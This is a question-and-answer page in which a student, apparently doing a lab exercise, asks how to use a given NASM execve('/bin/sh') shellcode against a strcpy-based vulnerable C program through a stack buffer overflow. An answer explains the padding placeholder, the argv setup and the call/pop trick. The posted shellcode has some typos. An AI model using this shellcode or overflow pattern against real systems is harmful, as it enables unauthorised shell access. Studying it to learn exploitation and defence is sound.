0

I have a C code and a assembly code which I have to use to perform a bufferoverflow attack on the C program using GDB. I would probably use the command run $(cat ), but..

I can't manage to compile the assembler code - times NNNN db 0xff gives an error about assigning non constant values, but I don't actually know what it does, or is supposed to do.

It seems that the last 4 lines work like a push on stack which esi points to, right?

Line mov byte al, 0x0b calls for execv with arguments /bin/sh0, AAAA and BBBB. Why do we need the last two?

Lastly the int 0x80 which again I don't know what does it do.

Also, the jmp short callit -> callit doit what is the difference between that and just starting with doit from the beginning?

If someone could help me out I'd be grateful, I'm lost after googling for hours.

NASM x86 code:

BITS 32
jmp short   callit

doit:
pop         esi
xor         eax, eax
mov         byte [esi+7], al
lea         bx, [esi]
mov         dword [esi+8], ebx
mov         dword [esi+12], eax
mov         byte al, 0x0b
mov         ebx, esi
lea         exc, [esi+8]
lea         edx, [esi+12]
int         0x80

callit
call        doit

            db '/bin/sh#AAAABBBB'
times NNNN  db 0xff
            dd 0xbffff050
            db 0x00

C code: 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) { 
    char buffer[256];

    if (argc > 1) {
        strcpy(buffer, argv[1]);
    }
    printf("%p\n", buffer);
    return 0;
}
Improve this question
0

1 Answer 1

Reset to default
2

You can't assemble times NNNN db 0xff because NNNN is not defined anywhere. You are presumably supposed to substitute a number there.

You need AAAA and BBBB so you can set up the argv array for the system call. argv[0] should be pointing to the program name and argv[1] should be NULL.

The CALL is used because that puts the return address on the stack, so you can use that to figure out the absolute address of your data.

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

But.. what am I supposed to put in there? I have no idea what is the purpose of these db/dd declarations. Overall, I know that I have to overflow the buffer exactly so that I can change the address to which ret jumps in strcpy to presumably the execv call with shell, but I am lost on how to do that :/

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.